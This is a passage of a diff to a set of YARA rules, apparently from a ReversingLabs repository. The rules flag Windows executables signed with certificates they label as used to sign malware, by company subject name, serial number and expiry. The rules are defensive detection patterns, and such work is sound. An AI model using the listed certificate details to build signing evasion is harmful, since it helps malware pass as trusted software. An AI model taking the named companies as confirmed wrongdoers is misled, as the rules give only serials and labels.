+		id = "0cf7573f-290d-58ac-989f-f82e9313d54e"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10770-L10786"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0ff773d252e5e0402171ae15d7ab43bcfd313eb8c326ed5f128a89ec43386a52"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3676-L3694"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "0d8f0df83572b8d31f29cb76f44d524fd1ae0467d2d99af959e45694524d18e8"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13927,21 +38592,21 @@ rule REVERSINGLABS_Cert_Blocklist_58Af00Ce542760Fc116B41Fa92E18589 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DICKIE MUSDALE WINDFARM LIMITED" and pe.signatures [ i ] . serial == "58:af:00:ce:54:27:60:fc:11:6b:41:fa:92:e1:85:89" and 1654819200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO \"MPS\"" and ( pe.signatures [ i ] . serial == "00:98:13:22:9e:fe:00:46:d2:35:42:cc:75:69:d5:a4:03" or pe.signatures [ i ] . serial == "98:13:22:9e:fe:00:46:d2:35:42:cc:75:69:d5:a4:03" ) and 1575849600 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_25Ba18A267D6D8E08Ebc6E2457D58D1E : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_86E5A9B9E89E5075C475006D0Ca03832 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "eb06576e-11ea-58ba-aa19-68c161f6aa68"
+		id = "f3058f56-dcbb-532a-b914-5ac0e6d70e6e"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10788-L10804"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "174fe170c26a8197486e7b390d9fce4da61fb68ee5dc9486d43dbeb3cf659c3a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3696-L3714"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "5ba0b0f1b104eb11023590b8ef2b9cc747372bc9310a754694d45d3b3ce293e9"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13951,21 +38616,21 @@ rule REVERSINGLABS_Cert_Blocklist_25Ba18A267D6D8E08Ebc6E2457D58D1E : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "5Y TECHNOLOGY LIMITED" and pe.signatures [ i ] . serial == "25:ba:18:a2:67:d6:d8:e0:8e:bc:6e:24:57:d5:8d:1e" and 1648684800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BlueMarble GmbH" and ( pe.signatures [ i ] . serial == "00:86:e5:a9:b9:e8:9e:50:75:c4:75:00:6d:0c:a0:38:32" or pe.signatures [ i ] . serial == "86:e5:a9:b9:e8:9e:50:75:c4:75:00:6d:0c:a0:38:32" ) and 1574791194 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_12Df5Ff3460979Cec1288D874A9Fbf83 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_075Dca9Ca84B93E8A89B775128F90302 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "9158c9a5-37fc-54bc-9601-3aa347a421ab"
+		id = "2fa6b400-7c6c-5bc4-9cac-78d52003a24e"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10806-L10822"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "3d4b5e56962d04bc35451eeab4c1870c8653c9afcbb28dc6bad7cfb1711e9df1"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3716-L3732"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "32af21e71fb3475c50de4cd8a24fa0aec1ee67bc01c1a3720c12f9ce822833c3"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13975,21 +38640,21 @@ rule REVERSINGLABS_Cert_Blocklist_12Df5Ff3460979Cec1288D874A9Fbf83 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FORWARD MUSIC AGENCY SRL" and pe.signatures [ i ] . serial == "12:df:5f:f3:46:09:79:ce:c1:28:8d:87:4a:9f:bf:83" and 1599091200 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "UAB GT-servis" and pe.signatures [ i ] . serial == "07:5d:ca:9c:a8:4b:93:e8:a8:9b:77:51:28:f9:03:02" and 1579305601 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Df2547B2Cab5689A81D61De80Eaaa3A2 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_0Ddce8Cdc91B5B649Bb4B45Ffbba6C6C : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "1e76a088-b0f2-54d6-b730-77552c74d7bd"
+		id = "9de11ec8-f408-593c-895f-08dff703ff10"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10824-L10842"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "cde89ae5b77ff6833fe642bdd74e81763ef068e31c07e7881906e4e4a5939942"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3734-L3750"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "622e6ed08ca26908539519f37cf493f8030100bd5e88cb05e851b7d56b0f4c0d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -13999,21 +38664,21 @@ rule REVERSINGLABS_Cert_Blocklist_Df2547B2Cab5689A81D61De80Eaaa3A2 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FORWARD MUSIC AGENCY SRL" and ( pe.signatures [ i ] . serial == "00:df:25:47:b2:ca:b5:68:9a:81:d6:1d:e8:0e:aa:a3:a2" or pe.signatures [ i ] . serial == "df:25:47:b2:ca:b5:68:9a:81:d6:1d:e8:0e:aa:a3:a2" ) and 1657756800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SLIM DOG GROUP SP Z O O" and pe.signatures [ i ] . serial == "0d:dc:e8:cd:c9:1b:5b:64:9b:b4:b4:5f:fb:ba:6c:6c" and 1580722435 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_28B691272719B1Ee : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_9Bd614D5869Bb66C96B67E154D517384 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8f1d125a-de0f-525b-8dac-702bc123cc53"
+		id = "eb42b516-aac6-5bee-af1d-70e0e66700f5"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10844-L10860"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "0bd973f415b7cfa0858c705c4486da9f181c7259af01d1cff486fb6b8e8e775b"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3752-L3770"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "d9eea38a1340797cef129b12cf2bb46c444e6f312db7356260f0ac0d9e63183d"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14023,21 +38688,21 @@ rule REVERSINGLABS_Cert_Blocklist_28B691272719B1Ee : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "2021945 Ontario Inc." and pe.signatures [ i ] . serial == "28:b6:91:27:27:19:b1:ee" and 1616410532 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "\"CENTR MBP\"" and ( pe.signatures [ i ] . serial == "00:9b:d6:14:d5:86:9b:b6:6c:96:b6:7e:15:4d:51:73:84" or pe.signatures [ i ] . serial == "9b:d6:14:d5:86:9b:b6:6c:96:b6:7e:15:4d:51:73:84" ) and 1581618180 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1C897216E58E83Cbe74Ad03284E1Fb82 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_540Cea639D5D48669B7F2F64 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8805805d-312d-5bd4-94da-c18270ac26bf"
+		id = "bfc514b6-43ef-5343-b5f2-d39168ba3e8d"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10862-L10878"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "6b3b2708d3a442fa6425e60ae900c94fc22fbfdb47f290ff56e9d349d99fd85f"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3772-L3788"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "3d3774f10ff9949ea13a7892662438b84b3eb895fc986092649fa9b192170d48"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14047,21 +38712,21 @@ rule REVERSINGLABS_Cert_Blocklist_1C897216E58E83Cbe74Ad03284E1Fb82 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "M-Trans Maciej Caban" and pe.signatures [ i ] . serial == "1c:89:72:16:e5:8e:83:cb:e7:4a:d0:32:84:e1:fb:82" and 1639119705 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "CENTR MBP LLC" and pe.signatures [ i ] . serial == "54:0c:ea:63:9d:5d:48:66:9b:7f:2f:64" and 1570871755 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_5A364C4957D93406F76321C2316F42F0 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_03A7748A4355020A652466B5E02E07De : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "49e36ae5-25f0-5e1d-82f0-c7ada2b4d914"
+		id = "10134543-04fa-5a2f-8f77-98444ad1d7f0"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10880-L10896"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "fe3a2b906debb3f03e6a403829fca02c751754e9a02442a962c66defb84aed83"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3790-L3806"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "6dc6d0fd2b702939847981ff31c2d8103227ccd0c19f999849ff89c64a90f92f"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14071,21 +38736,21 @@ rule REVERSINGLABS_Cert_Blocklist_5A364C4957D93406F76321C2316F42F0 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Board Game Bucket Ltd" and pe.signatures [ i ] . serial == "5a:36:4c:49:57:d9:34:06:f7:63:21:c2:31:6f:42:f0" and 1661337307 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Teleneras MB" and pe.signatures [ i ] . serial == "03:a7:74:8a:43:55:02:0a:65:24:66:b5:e0:2e:07:de" and 1575244801 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_E7E7F7180666546Ce7A8Da32119F5Ce1 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_B881A72D4117Bbc38B81D3C65C792C1A : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "8984ac03-2646-54a1-a6d3-4c2cc72806e7"
+		id = "593c1799-a5df-5b3e-8a8b-826d808a14f0"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10898-L10916"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "940f6508208998593f309ffeeeda20ab475d427c952a14871b6e58e17d2a4c85"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3808-L3826"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "bad2a06090f077ebc635d21446b47c9f115fe477567afb3d5994043f5a7883b1"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14095,21 +38760,21 @@ rule REVERSINGLABS_Cert_Blocklist_E7E7F7180666546Ce7A8Da32119F5Ce1 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "C\\xC3\\x94NG TY TNHH PDF SOFTWARE" and ( pe.signatures [ i ] . serial == "00:e7:e7:f7:18:06:66:54:6c:e7:a8:da:32:11:9f:5c:e1" or pe.signatures [ i ] . serial == "e7:e7:f7:18:06:66:54:6c:e7:a8:da:32:11:9f:5c:e1" ) and 1661558399 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Red GmbH" and ( pe.signatures [ i ] . serial == "00:b8:81:a7:2d:41:17:bb:c3:8b:81:d3:c6:5c:79:2c:1a" or pe.signatures [ i ] . serial == "b8:81:a7:2d:41:17:bb:c3:8b:81:d3:c6:5c:79:2c:1a" ) and 1581936420 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_062B2827500C5Df35A83F661B3Af5Dd3 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_08653Ef2Ed9E6Ebb56Ffa7E93F963235 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "784c58d9-9a13-5402-867e-c1b144512957"
+		id = "9ac976c0-260f-5207-ae39-bbb722c38a92"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10918-L10934"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "4edc263b08b21428b5f2f4f14f9582c0f96f79cb49fbba563c103bf8bb2037a6"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3828-L3844"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "5ae8d2fb03cd0f945c2f5eb86de4e5da4fbb1cdf233d8a808157304538ced872"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14119,21 +38784,21 @@ rule REVERSINGLABS_Cert_Blocklist_062B2827500C5Df35A83F661B3Af5Dd3 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "*.eos.com" and pe.signatures [ i ] . serial == "06:2b:28:27:50:0c:5d:f3:5a:83:f6:61:b3:af:5d:d3" and 1651449600 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Haw Farm LIMITED" and pe.signatures [ i ] . serial == "08:65:3e:f2:ed:9e:6e:bb:56:ff:a7:e9:3f:96:32:35" and 1581465601 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_7Bf27695Fd20B588F2B2F173B6Caf2Ba : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_9C4816D900A6Ecdbe54Adf72B19Ebcf5 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a3e6923a-f2c4-5d7c-aeab-bdb7fe03c597"
+		id = "bd22372d-774b-5e25-b4e5-47d34fe1c40b"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10936-L10952"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "94d8739761b6a8ee91550be47432b046609b076aab6e57996de123a0fcaba73e"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3846-L3864"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "92e8130f444417d5bc3788721280338bbed33e3362104de0cf27bc7c1fc30d0e"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14143,21 +38808,21 @@ rule REVERSINGLABS_Cert_Blocklist_7Bf27695Fd20B588F2B2F173B6Caf2Ba : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Game Warriors Limited" and pe.signatures [ i ] . serial == "7b:f2:76:95:fd:20:b5:88:f2:b2:f1:73:b6:ca:f2:ba" and 1662112800 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Datamingo Limited" and ( pe.signatures [ i ] . serial == "00:9c:48:16:d9:00:a6:ec:db:e5:4a:df:72:b1:9e:bc:f5" or pe.signatures [ i ] . serial == "9c:48:16:d9:00:a6:ec:db:e5:4a:df:72:b1:9e:bc:f5" ) and 1557187200 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_1B248C8508042D36Bbd5D92D189C61D8 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_269174F9Fe7C6Ed4E1D19B26C3F5B35F : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "4ad05207-10d1-53c5-8383-a3c71a447ed6"
+		id = "fbcf1f18-f612-5516-9a67-2564de76c456"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10954-L10970"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "2c063d0878a8bf6cd637e1dac2cb9164beb52c951e01858a7c3c9c4c1a853f54"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3866-L3882"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "95c9720d6311c2fe7026b6cac092d59967479e6c9382eac1d26f7745efa92860"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14167,21 +38832,21 @@ rule REVERSINGLABS_Cert_Blocklist_1B248C8508042D36Bbd5D92D189C61D8 : INFO FILE
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Digital Robin Limited" and pe.signatures [ i ] . serial == "1b:24:8c:85:08:04:2d:36:bb:d5:d9:2d:18:9c:61:d8" and 1663171218 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GO ONLINE d.o.o." and pe.signatures [ i ] . serial == "26:91:74:f9:fe:7c:6e:d4:e1:d1:9b:26:c3:f5:b3:5f" and 1586386919 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_032660Ee1D49Ad35086027473E2614E5E724 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_523Fb4036368Dc26192D68827F2D889B : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "29cb9255-0a34-58e8-88b2-fad988c7d229"
+		id = "bfce2ea9-cbe0-5b58-b7f8-39d2dad28db6"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10972-L10988"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "8d1435d2fa70db12cde2f9098e35ca1737f5aac36bac91329b28f03aad090e90"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3884-L3900"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "f1886a046305637d335c493972560de56d8186bf99183aed5e2040b2e530fc22"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14191,21 +38856,21 @@ rule REVERSINGLABS_Cert_Blocklist_032660Ee1D49Ad35086027473E2614E5E724 : INFO FI
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "sunshine.com" and pe.signatures [ i ] . serial == "03:26:60:ee:1d:49:ad:35:08:60:27:47:3e:26:14:e5:e7:24" and 1660238245 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OOO MEDUZA SERVICE GROUP" and pe.signatures [ i ] . serial == "52:3f:b4:03:63:68:dc:26:19:2d:68:82:7f:2d:88:9b" and 1586847880 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_043052956E1E6Dbd5F6Ae3D8B82Cad2A2Ed8 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_84F842F6D33Cd2F25B88Dd1710E21137 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "ac09f8ac-fbdd-5989-a7e7-07373a69213b"
+		id = "202593d3-d63a-5852-b680-516504d92031"
 		date = "2023-11-08"
 		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/certificate/blocklist.yara#L10990-L11006"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "c29fb109c741437a3739f1c42aadace8f612ef1e3ea90e3e2bdd8a92c85e766a"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L3902-L3920"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "5aad8e95d1306626b63d767fce4706104330dd776b75c09cc404227863564307"
 		score = 75
 		quality = 90
 		tags = "INFO, FILE"
@@ -14215,21 +38880,21 @@ rule REVERSINGLABS_Cert_Blocklist_043052956E1E6Dbd5F6Ae3D8B82Cad2A2Ed8 : INFO FI
 		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ok.com" and pe.signatures [ i ] . serial == "04:30:52:95:6e:1e:6d:bd:5f:6a:e3:d8:b8:2c:ad:2a:2e:d8" and 1662149613 <= pe.signatures [ i ] . not_after )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DataNext s.r.o." and ( pe.signatures [ i ] . serial == "00:84:f8:42:f6:d3:3c:d2:f2:5b:88:dd:17:10:e2:11:37" or pe.signatures [ i ] . serial == "84:f8:42:f6:d3:3c:d2:f2:5b:88:dd:17:10:e2:11:37" ) and 1586775720 <= pe.signatures [ i ] . not_after )
 }
 
-rule REVERSINGLABS_Cert_Blocklist_Dbc03Ca7E6Ae6Db6 : INFO FILE
+rule REVERSINGLABS_Cert_Blocklist_4Fbcaa289Ba925B4E247809B6B028202 : INFO FILE
 {
 	meta:
 		description = "Certificate used for digitally signing malware."
